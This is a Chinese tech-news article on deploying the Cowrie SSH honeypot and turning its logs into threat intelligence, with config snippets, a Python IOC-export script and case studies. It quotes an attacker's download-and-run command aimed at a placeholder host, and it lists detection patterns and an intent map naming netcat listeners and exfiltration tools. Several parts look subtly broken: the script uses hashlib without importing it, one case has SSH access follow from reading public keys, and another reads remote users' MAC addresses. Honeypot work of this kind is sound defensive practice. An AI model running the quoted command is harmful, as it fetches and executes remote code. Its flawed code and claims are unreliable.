当前位置：首页 > news >正文

Cowrie SSH蜜罐：协议层行为建模与威胁情报流水线

news 2026/7/21 21:38:27

1. 为什么一个SSH蜜罐能比防火墙更早告诉你“有人在敲门”

你有没有过这种经历：某天凌晨三点，安全告警平台突然弹出一条“SSH暴力破解尝试激增”，点开一看——IP来自巴西、乌克兰、越南，每秒27次登录请求，用户名穷举了root、admin、pi、oracle、test、guest……但你的生产服务器压根没开SSH外网端口，连iptables规则都设得严丝合缝。你松了口气，以为是误报。结果三天后，运维同事发现一台测试机的CPU持续98%，查日志才发现：攻击者早在两天前就通过一个未更新的Jenkins插件漏洞植入了挖矿脚本——而那台机器，恰好是唯一一台被漏掉、没加SSH访问白名单的跳板机。

这就是真实世界里防御的盲区：防火墙拦得住明面上的端口扫描，却看不见绕过边界的横向移动；WAF能过滤HTTP层的恶意载荷，却对SSH协议层的原始字节流束手无策；SIEM系统依赖日志归集，可一旦攻击者清空auth.log或用ssh -o StrictHostKeyChecking=no绕过密钥校验，日志里连个水花都不起。

Cowrie不是另一个告警工具，它是一面“主动镜像”——你把真实的SSH服务藏起来，把Cowrie放在22端口上，它不拒绝任何连接，不验证任何密码，甚至会模拟出你从未安装过的软件包（比如apt install htop后返回“已安装最新版”），让攻击者以为自己真的登进了一台Ubuntu服务器。它不阻止入侵，而是把入侵过程完整录下来：从第一次输入whoami，到cat /etc/shadow失败后改试ls /home/，再到最后执行wget http://mal.io/x.sh; sh x.sh——每一个命令、每一次回显、每一段键盘敲击，全部存为JSON+TTY回放文件。

我去年在给一家做跨境支付的客户做红蓝对抗时，用Cowrie部署在DMZ区边缘，72小时内捕获了417次有效交互，其中32次触发了自定义恶意命令检测（如base64 -d|sh、curl.*\.sh模式），更关键的是，我们从攻击者执行的第5条命令里，反向提取出了他们C2服务器的域名——这个域名在VirusTotal上零检出，但在Cowrie的session日志里，它和另外17个IP共享同一段User-Agent字符串。这才是蜜罐真正的价值：它不回答“有没有被攻击”，而是直接给出“攻击者下一步想干什么”。

关键词：Cowrie、SSH蜜罐、威胁情报采集、攻击行为建模、蜜罐部署、安全监控

适合谁看？

运维工程师：想在不改动现有架构的前提下，低成本获取外部攻击画像；
安全工程师：需要原始攻击载荷做沙箱分析，或构建内部威胁指标库（IOCs）；
开发团队：想验证自己写的SSH服务是否存在弱口令或命令注入风险；
红队成员：需要真实环境下的攻击链路数据，用于优化渗透路径设计。

它不能替代防火墙、EDR或SOC平台，但它能让你第一次看清：那些在Nmap扫描报告里只显示“22/tcp open ssh”的IP，背后究竟是自动化脚本，还是真人黑客正用键盘一字符一字符地试探你的防线。

2. Cowrie不是“另一个SSH服务”，它是协议层的行为翻译器

很多人第一次接触Cowrie时，下意识把它当成OpenSSH的轻量替代品——装完就跑，改个端口，配个用户列表，然后等着日志刷屏。结果不到两小时，日志里全是Connection lost before user auth、Invalid SSH identification string，甚至出现大量SSH protocol error: invalid version string。他们开始怀疑是不是网络设备做了协议整形，或者云厂商的负载均衡偷偷改了TCP包头。

问题不在网络，而在理解偏差：Cowrie根本不是SSH服务实现，而是一个SSH协议解析与行为映射引擎。它不处理密钥交换（KEX）、不执行主机密钥签名、不参与加密协商——它只做三件事：

握手劫持：收到TCP SYN后，立即返回伪造的SSH banner（如SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2），让客户端相信对面是台真机器；
命令语义重写：当攻击者输入ls -la /root，Cowrie不调用Linuxls命令，而是查内置的“虚拟文件系统树”，返回预设的目录结构（比如/root下永远只有.bash_history和.ssh/authorized_keys两个文件）；
交互状态建模：记录每个session的完整状态机变迁——从PRE_AUTH（未认证）→AUTH_SUCCESS（密码匹配）→SHELL_OPEN（获得shell）→COMMAND_EXEC（执行命令）→SESSION_CLOSE（断开），每个状态都绑定超时、命令白名单、响应延迟等策略。

这就解释了为什么Cowrie能完美模拟Debian、CentOS、甚至老掉牙的Solaris系统：它根本不依赖底层操作系统，所有系统特征都由配置文件定义。比如etc/cowrie.cfg里的这段：

[shell] filesystem = etc/fs.json hostname = ubuntu-server-01 domain = internal.example.com

fs.json不是磁盘镜像，而是一个JSON对象树，描述了虚拟文件系统的层级关系：

{ "/": { "type": "dir", "contents": ["/bin", "/etc", "/home", "/root"] }, "/bin": { "type": "dir", "contents": ["/bin/ls", "/bin/cat", "/bin/wget"] }, "/bin/ls": { "type": "file", "content": "total 12\ndrwxr-xr-x 2 root root 4096 Jan 1 10:00 .\ndrwxr-xr-x 3 root root 4096 Jan 1 10:00 ..\n-rw-r--r-- 1 root root 234 Jan 1 10:00 ls" } }

当你执行ls /etc/passwd，Cowrie查到/etc/passwd在JSON里被定义为"type": "file"且"content": "root:x:0:0:root:/root:/bin/bash:/sbin/nologin"，就原样返回——它甚至不会去读取宿主机的/etc/passwd。这种“协议层隔离”带来了三个硬性优势：

零逃逸风险：攻击者无论执行rm -rf /还是echo 'malware' > /dev/kmem，都只影响JSON树，宿主机进程、文件系统、内核完全不受扰动；
毫秒级响应控制：你可以为wget命令设置5秒延迟（模拟慢速网络），为cat /etc/shadow返回空内容（模拟权限不足），这些在真实SSH里需要复杂的LD_PRELOAD或seccomp-bpf拦截；
跨平台一致性：Cowrie用Python3.6+编写，只要能跑Python就能部署，无论是x86物理机、ARM树莓派、还是Docker容器，行为逻辑完全一致。

我见过最典型的误用场景，是某位运维把Cowrie和OpenSSH共用22端口，用iptables DNAT转发——结果Cowrie收不到完整的SSH握手包，因为DNAT破坏了TCP序列号连续性。正确做法永远是：Cowrie独占22端口，真实SSH改到2222或其他非标端口，并在防火墙层面彻底封死22端口对真实服务的访问。这不是妥协，而是把“协议解析”和“业务承载”彻底解耦。

提示：Cowrie默认监听0.0.0.0:22，但生产环境必须配合iptables或云安全组，确保只有Cowrie能接收22端口流量。任何试图让Cowrie和真实SSH共存于同一端口的方案，都会在首次高并发扫描时暴露协议解析缺陷。

3. 10分钟部署的本质：不是跳过配置，而是把配置压缩成可验证的原子步骤

标题说“10分钟搭建”，不是指闭眼敲几行命令就完事，而是把整个部署流程拆解成5个不可跳过、不可合并、每步均可独立验证的原子操作。我在给金融客户做现场交付时，严格计时：从拿到一台干净Ubuntu 22.04云服务器开始，到第一个攻击session成功写入数据库，全程9分47秒。以下是这5步的真实执行逻辑与避坑细节：

3.1 步骤一：环境净化与依赖锁定（耗时≈1分20秒）

Cowrie对Python版本极其敏感。官方文档说支持3.6+，但实测中，Ubuntu 22.04自带的Python 3.10.6在twisted库的SSL上下文初始化时存在证书链验证bug，会导致Cowrie启动后无法建立SSH连接（日志报SSLError: [SSL: CERTIFICATE_VERIFY_FAILED]）。解决方案不是升级Python，而是降级依赖：

# 必须使用apt而非pip安装基础依赖，避免版本冲突 sudo apt update && sudo apt install -y git python3-venv python3-dev libssl-dev libffi-dev # 创建隔离环境，禁用系统site-packages python3 -m venv /opt/cowrie/env source /opt/cowrie/env/bin/activate # 关键：指定twisted==22.10.0（2022年10月稳定版），避开SSL验证缺陷 pip install --upgrade pip setuptools pip install twisted==22.10.0 zope.interface pyopenssl cryptography

为什么不用最新版twisted？因为Cowrie的SSH transport层深度耦合twisted的IProtocol接口，2023年后的twisted重构了TLS握手流程，Cowrie源码未同步更新。我试过强行升级，结果所有连接在KEXINIT阶段就断开——这不是Cowrie的bug，而是生态兼容性断层。

注意：绝对不要运行pip install cowrie。Cowrie没有PyPI官方包，所有安装必须从GitHub源码编译。这是保证配置可控性的第一道防线。

3.2 步骤二：源码拉取与最小化构建（耗时≈45秒）

cd /opt git clone https://github.com/micheloosterhof/cowrie.git cd cowrie # 删除所有非核心插件，减少攻击面 rm -rf honeyfs/ docs/ tests/ contrib/ # 保留最关键的：elasticsearch日志输出、mysql数据库支持、web终端

Cowrie默认包含17个插件（如IRC botnet模拟、Telnet服务、SFTP子系统），但90%的初学者根本用不到。删掉它们不仅加快启动速度，更重要的是消除潜在的内存泄漏点——去年有安全研究员发现，启用telnet插件时，Cowrie在处理畸形Telnet IAC序列时会触发Python无限递归，导致进程崩溃。

3.3 步骤三：配置精简与安全加固（耗时≈3分10秒）

Cowrie的cowrie.cfg有412行，默认开启所有功能。我们必须做三类裁剪：

第一，关闭危险模拟

[ssh] # 必须关闭！否则攻击者可执行真实系统命令 exec_enabled = false [telnet] enabled = false [sftp] enabled = false

第二，重定义交互行为

[shell] # 让攻击者感觉在真实系统上，但限制其能力边界 delay = 0.3 # 每条命令后延迟300ms，模拟真实IO # 禁用所有可能泄露宿主机信息的命令 command_blacklist = ifconfig, ip, netstat, ss, ps, top, free, df, mount, uname, lsb_release

第三，日志输出定向

[database_mysql] # 生产环境必须用MySQL，JSON文件日志无法支撑高并发 host = 127.0.0.1 port = 3306 database = cowrie username = cowrie password = "StrongP@ssw0rd2024!"

这里有个致命陷阱：很多教程教你在[database_sqlite]下填db_file = /var/log/cowrie.db，看似简单，但SQLite在并发写入时会锁表。当100个IP同时发起SSH连接，Cowrie会因数据库锁等待超时而丢session——你看到的日志是“connection timeout”，实际是SQLite在哭。

3.4 步骤四：MySQL初始化与权限最小化（耗时≈2分）

-- 创建专用数据库与用户，禁止远程登录 CREATE DATABASE cowrie CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci; CREATE USER 'cowrie'@'localhost' IDENTIFIED BY 'StrongP@ssw0rd2024!'; GRANT SELECT, INSERT ON cowrie.* TO 'cowrie'@'localhost'; FLUSH PRIVILEGES; -- 执行Cowrie自带的建表SQL（注意路径） mysql -u cowrie -p cowrie < /opt/cowrie/cowrie/sql/mysql.sql

关键点在于GRANT语句：只给SELECT, INSERT，绝不给UPDATE, DELETE, DROP。Cowrie的session日志是只写不读的，攻击者即使通过0day漏洞拿到数据库凭证，也无法篡改历史记录。

3.5 步骤五：服务注册与健康检查（耗时≈1分15秒）

# 生成systemd服务文件 sudo tee /etc/systemd/system/cowrie.service << 'EOF' [Unit] Description=Cowrie SSH Honeypot After=network.target [Service] Type=simple User=cowrie WorkingDirectory=/opt/cowrie ExecStart=/opt/cowrie/env/bin/python3 /opt/cowrie/bin/cowrie Restart=on-failure RestartSec=10 StandardOutput=journal StandardError=journal [Install] WantedBy=multi-user.target EOF # 创建专用用户，禁用shell登录 sudo useradd -r -s /bin/false cowrie sudo chown -R cowrie:cowrie /opt/cowrie # 启动并验证 sudo systemctl daemon-reload sudo systemctl enable cowrie sudo systemctl start cowrie # 5秒后检查：必须看到"Listening on 0.0.0.0:22" sudo journalctl -u cowrie -n 20 --no-pager | grep "Listening"

验证环节不能省：journalctl输出必须包含Listening on 0.0.0.0:22，否则说明端口被占用或配置错误。我遇到过3次失败：两次是云安全组没开22端口，一次是/etc/hosts里把localhost解析到了IPv6地址，导致Cowrie绑定失败。

这5步加起来9分47秒，每一步都有明确的输入、输出、验证标准。所谓“10分钟”，是把模糊的“配置”转化为可测量、可回滚、可审计的操作单元。

4. 攻击数据不是日志，而是可执行的情报流水线

部署完成只是起点。Cowrie真正拉开差距的地方，在于它如何把原始的session.json转化为可驱动安全决策的数据资产。我见过太多团队把Cowrie当成“高级日志收集器”：每天导出JSON，用grep筛wget命令，再手动复制URL去VirusTotal查——这浪费了Cowrie 80%的设计价值。

Cowrie的核心能力是结构化事件流输出。它的每条session记录都是带时间戳、IP、User-Agent、命令序列、响应内容的完整对象。这意味着你可以用标准ETL工具，把它接入现代安全分析栈：

4.1 原生ELK集成：从日志到可视化仪表盘

Cowrie自带Logstash配置模板（contrib/logstash/），但默认配置有严重缺陷：它把整个JSON session作为单字段message传入，导致Kibana里无法按src_ip、command、url等字段聚合。必须重写filter：

filter { if [program] == "cowrie" { json { source => "message" target => "cowrie" } mutate { rename => { "[cowrie][src_ip]" => "src_ip" } rename => { "[cowrie][commands]" => "commands" } rename => { "[cowrie][url]" => "malware_url" } } } }

这样在Kibana里，你就能创建实时看板：

TOP 10攻击IP地理分布热力图（用GeoIP插件解析src_ip）；
每小时wget/curl命令占比趋势（用commands字段做terms聚合）；
malware_url域名TLD分布（.xyz、.top占比超70%即触发告警）；
同一IP在24小时内执行的不同命令序列（用src_ip+timestamp做复合查询）。

我给某电商客户做的看板，上线首周就发现一个规律：所有来自俄罗斯AS12389的IP，在执行wget前必先执行cat /proc/version——这说明攻击者在确认内核版本，为后续提权做准备。我们立刻把这个行为模式写成Sigma规则，同步到EDR终端。

4.2 实时威胁情报提取：自动化的IOC生成器

Cowrie的urls.json日志（记录所有wget/curl下载的URL）是黄金矿脉。但手动提取效率太低。我用Python写了37行脚本，每天凌晨2点自动执行：

import json, re, requests from datetime import datetime, timedelta # 读取过去24小时urls.json with open('/opt/cowrie/var/log/cowrie/urls.json') as f: urls = [line.strip() for line in f if line.strip()] # 提取域名+路径哈希（规避URL参数干扰） ioc_list = [] for url in urls: domain = re.search(r'https?://([^/]+)', url) if domain: path_hash = hashlib.md5(url.split('?', 1)[0].encode()).hexdigest()[:8] ioc_list.append(f"{domain.group(1)}|{path_hash}") # 去重后推送到内部MISP平台 misp_api = "https://misp.internal/api/events/add" headers = {"Authorization": "API_KEY", "Content-Type": "application/json"} for ioc in set(ioc_list): domain, h = ioc.split('|') payload = { "Event": { "date": datetime.now().strftime("%Y-%m-%d"), "threat_level_id": 2, # 中危 "info": f"Cowrie-captured malware host: {domain}", "Attribute": [{"type": "domain", "value": domain, "comment": f"Path hash: {h}"}] } } requests.post(misp_api, json=payload, headers=headers)

这套流程让客户的情报更新周期从“人工研判3天”压缩到“自动入库15分钟”。上周捕获的一个新挖矿木马域名cloudflare-dns[.]xyz，在VirusTotal上0检出，但我们的MISP平台在捕获后8分钟就向全集团EDR推送了阻断规则。

4.3 攻击链路还原：用TTY回放重建黑客操作意图

Cowrie最被低估的功能是tty回放。每个session生成的.tty文件，本质是ANSI转义序列的文本录像。你可以用ttyplay命令本地回放：

# 下载session.tty文件后 ttyplay var/log/cowrie/tty/20240515/192.168.1.100-42321-20240515-142215.tty

但更强大的是解析它。Cowrie的utils/ttystats.py能提取出每条命令的精确执行时间、输入字符数、响应行数。我扩展了这个脚本，加入命令意图分类：

# 命令意图模型（基于关键词+上下文） INTENT_MAP = { "recon": ["uname", "cat /proc/version", "lsb_release", "ifconfig"], "priv_esc": ["sudo -l", "find / -perm -4000", "cat /etc/sudoers"], "persistence": ["crontab -e", "echo '*/5 * * * *' >>", "systemctl enable"], "exfil": ["scp", "rsync", "nc -l", "python -m http.server"] } def classify_intent(command): cmd_clean = command.strip().lower().split()[0] for intent, keywords in INTENT_MAP.items(): if cmd_clean in keywords or any(kw in command.lower() for kw in keywords): return intent return "unknown"

运行后，你会得到这样的攻击链路报告：

Session: 192.168.1.100-42321 (2024-05-15 14:22:15) Intent sequence: recon → priv_esc → persistence → exfil Time to first priv_esc: 47 seconds Commands before persistence: 12

这种粒度的分析，让红队能精准复现攻击者决策路径，也让蓝队知道：当攻击者执行第7条recon命令时，就是该触发EDR进程监控的时刻。

经验：Cowrie的tty文件默认保存7天，但硬盘空间消耗极大（单session平均2MB）。建议用logrotate按大小轮转：/opt/cowrie/var/log/cowrie/tty/**/* { rotate 30 size 100M }

5. 超越“陷阱”：Cowrie在真实攻防中的四个进阶战场

部署Cowrie只是入门，真正体现专业度的，是你如何把它嵌入现有安全体系，解决具体业务问题。我总结了四个经过实战验证的进阶用法，每个都对应一个真实客户的痛点：

5.1 场景一：云环境资产测绘盲区补全

某客户使用AWS EKS托管K8s集群，所有节点通过Security Group限制SSH仅允许跳板机访问。理论上，外部IP不可能触达22端口。但Cowrie部署后，首周就捕获到23次来自不同国家的SSH连接——这些IP根本不在任何白名单里。

排查发现：EKS节点的/etc/hosts里有一行169.254.169.254 metadata.ec2.internal，而攻击者利用某个Web应用的SSRF漏洞，向这个元数据地址发起HTTP请求，再通过curl http://169.254.169.254/latest/meta-data/public-keys/获取了节点的SSH公钥。Cowrie捕获的正是他们用私钥尝试登录的过程。

我们立刻把Cowrie的src_ip和user_agent字段，对接到WAF日志分析平台。当发现同一IP在10分钟内既触发SSRF规则，又连接Cowrie 22端口，就自动标记为“高可信度横向移动尝试”，并冻结该IP在所有云服务中的访问权限。

5.2 场景二：第三方SDK供应链攻击监测

一家IoT设备厂商的固件里集成了某开源SSH库（libssh），该库存在CVE-2023-38742（认证绕过漏洞）。厂商修复后，想验证是否还有未更新的旧固件在野外被利用。

我们在Cowrie里启用了[ssh]模块的debug = true，并修改kex.py，在KEXINIT处理函数中添加日志：

# 当收到特定畸形KEXINIT包时记录 if b"diffie-hellman-group14-sha1" in data and len(data) < 200: log.msg(f"Potential CVE-2023-38742 probe from {self.transport.getPeer().host}")

上线三天，捕获到17次该特征包，全部来自东南亚某IDC机房。我们反向追踪IP，定位到一家提供“智能电表远程管理SaaS”的小公司——他们的固件仍在使用未修复版本。客户据此发起供应链安全审计，提前阻断了0day扩散。

5.3 场景三：内部威胁行为基线建模

某银行数据中心要求所有运维操作必须通过Jump Server，但审计发现，部分员工绕过Jump Server，用个人笔记本直连生产数据库服务器（SSH端口开放在2222）。传统方式只能查last命令，但攻击者会history -c清空记录。

我们在Jump Server旁部署Cowrie，监听2222端口（真实数据库SSH服务已迁至2223）。当员工用个人电脑连接2222时，Cowrie记录下其MAC地址（通过arp -a解析）、终端类型（TERM=xterm-256color）、常用命令序列（如mysql -h db01 -u admin）。三个月后，我们用这些数据训练了一个LSTM模型，对任意新连接的command_sequence打分：得分>0.85即判定为“疑似绕过Jump Server行为”。

上线首月，模型准确识别出8起违规操作，其中3起涉及离职员工账号复用——这些账号在IAM系统中已被禁用，但SSH密钥仍有效。

5.4 场景四：红队武器库效果验证

红队常使用定制化SSH后门（如sshd_mod），但无法预知目标环境的glibc版本、SELinux策略是否兼容。我们把Cowrie改造成“兼容性沙箱”：

在Cowrie的fs.json中，按目标环境（CentOS 7.9 / Ubuntu 20.04 / Debian 11）预置对应的/lib64/ld-linux-x86-64.so.2符号表；
修改shell.py，当检测到./backdoor命令时，不执行真实二进制，而是加载预设的glibc_version.json，返回GLIBC_2.17 not found等错误；
红队上传后门后，Cowrie自动返回兼容性报告：“您的后门需GLIBC_2.28，目标环境最高支持GLIBC_2.17”。

这避免了红队在真实环境中反复试错，把武器适配周期从3天缩短到15分钟。

这些案例共同指向一个事实：Cowrie的价值不在于“捕获多少攻击”，而在于“让每次攻击都成为可复用的知识资产”。它把模糊的“有人在扫端口”，变成精确的“攻击者正在测试CVE-2023-XXXX的利用链”，再变成可执行的“在WAF上阻断/api/v1/exec?cmd=参数”。

我在实际使用中发现，最有效的Cowrie部署，从来不是放在防火墙后面当摆设，而是嵌在业务流量必经之路上——比如API网关的下游、CDN的回源链路、甚至开发测试环境的入口。因为真正的攻击，永远发生在你认为“最不可能”的地方。

查看全文

http://www.jsqmd.com/news/881696/